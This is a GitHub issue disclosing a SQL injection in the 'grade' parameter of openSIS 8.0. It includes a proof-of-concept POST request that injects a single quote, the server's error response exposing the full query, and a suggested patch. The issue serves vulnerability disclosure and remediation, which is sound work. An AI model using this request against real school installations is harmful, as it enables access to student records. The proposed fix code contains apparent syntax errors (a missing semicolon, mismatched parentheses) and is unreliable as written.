Skip to content

SQL injection in multiple functions #202

Closed
@quanhx11

Description

@quanhx11

A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the /opensis/functions/GetStuListFnc.php Grade= parameter
image
POC
image

REQUEST

POST /Modules.php?modname=students/AdvancedReport.php&modfunc=&search_modfunc=list&next_modname=students/AdvancedReport.php HTTP/1.1
Host: 192.168.21.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 850
Origin: http://192.168.21.130
Connection: close
Referer: http://192.168.21.130/Modules.php?modname=miscellaneous/Portal.php&failed_login=
Cookie: PHPSESSID=1kkijlk6rkvfn3rs91kjn5hj1i; miniSidebar=0
Upgrade-Insecure-Requests: 1

last=ad&first=a%CC%81cd&stuid=adc&altid=123&addr=dsca&grade='&section=&w_course_period_id=27&marking_period_id=&activity_id=&absences_term=FY&absences_low=&absences_high=&list_gpa=Y&gpa_term=19&gpa_low=&gpa_high=&cgpa=Y&cgpa_low=&cgpa_high=&month_include_active_date=09&day_include_active_date=01&year_include_active_date=2021&class_rank_term=CUM&class_rank_low=&class_rank_high=&letter_grade_exclude=Y&letter_grade_term=19&letter_grade%5B8%5D=Y&sql_save_session=true&mp_comment=&month_from_birthdate=&day_from_birthdate=&month_to_birthdate=&day_to_birthdate=&goal_title=&goal_description=&progress_name=&progress_description=&med_month=&med_day=&med_year=&doctors_note_comments=&type=&imm_month=&imm_day=&imm_year=&imm_comments=&ma_month=&ma_day=&ma_year=&med_alrt_title=&nv_month=&nv_day=&nv_year=&reason=&result=&med_vist_comments=&address_group=Y

RESPONSE

HTTP/1.1 200 OK
Date: Wed, 22 Sep 2021 05:39:16 GMT
Server: Apache/2.4.46 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 60208
Connection: close
Content-Type: text/html; charset=UTF-8

[...]
<b>SQL:</b></TD>
			<TD>SELECT COUNT(s.STUDENT_ID) AS STUDENT_COUNT  FROM students s ,student_enrollment ssm  LEFT OUTER JOIN student_address sam ON (ssm.STUDENT_ID=sam.STUDENT_ID AND sam.TYPE='Home Address' ) ,schedule w_ss WHERE ssm.STUDENT_ID=s.STUDENT_ID   AND ssm.SYEAR='2023' AND (ssm.START_DATE IS NOT NULL AND ('2021-09-22'<=ssm.END_DATE OR ssm.END_DATE IS NULL)  OR ssm.DROP_CODE=33 )  AND ssm.SYEAR='2023' AND ssm.SCHOOL_ID='1' AND w_ss.STUDENT_ID=s.STUDENT_ID AND w_ss.SYEAR=ssm.SYEAR AND w_ss.SCHOOL_ID=ssm.SCHOOL_ID AND w_ss.COURSE_PERIOD_ID='27' AND ('2021-09-22' BETWEEN w_ss.START_DATE AND w_ss.END_DATE OR w_ss.END_DATE IS NULL) AND NOT EXISTS (SELECT '' FROM student_report_card_grades sg3 WHERE sg3.STUDENT_ID=ssm.STUDENT_ID AND sg3.SYEAR=ssm.SYEAR AND sg3.REPORT_CARD_GRADE_ID IN ('8')AND sg3.MARKING_PERIOD_ID='19' ) AND s.IS_DISABLE IS NULL AND ssm.STUDENT_ID = 'adc'  AND LOWER(s.ALT_ID) LIKE '123%'  AND LOWER(s.LAST_NAME) LIKE 'ad%'  AND LOWER(s.FIRST_NAME) LIKE 'ácd%'  AND ssm.GRADE_ID IN(SELECT id FROM school_gradelevels WHERE title=NULL'') AND (LOWER(sam.STREET_ADDRESS_1) LIKE '%dsca%' OR LOWER(sam.CITY) LIKE 'dsca%' OR LOWER(sam.STATE)='dsca' OR ZIPCODE LIKE 'dsca%')</TD>
		</TR>
		</TR><TR>
			<TD align=right><b>Traceback:</b></TD>
			<TD>/var/www/opensis/functions/GetStuListFnc.php at 680</TD>
		</TR>
		</TR><TR>
			<TD align=right><b>Additional Information:</b></TD>
			<TD>You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''') AND (LOWER(sam.STREET_ADDRESS_1) LIKE '%dsca%' OR LOWER(sam.CITY) LIKE 'd...' at line 1</TD>
		</TR>
[...]


SOLUTION
Use function sqlSecurityFilter() before assign $_REQUEST['grade'] to query.
the code should look like:

  if ($_REQUEST['grade']) {
        $grade=sqlSecurityFilter($_REQUEST['grade'])
        $allSQL .= ' AND ssm.GRADE_ID IN(SELECT id FROM school_gradelevels WHERE title= \'' . singleQuoteReplace("'", "\'", $grade . '\')';
    }

Metadata

Metadata

Assignees

No one assigned

    Labels

    Next ReleaseFix will be provided with the next release

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions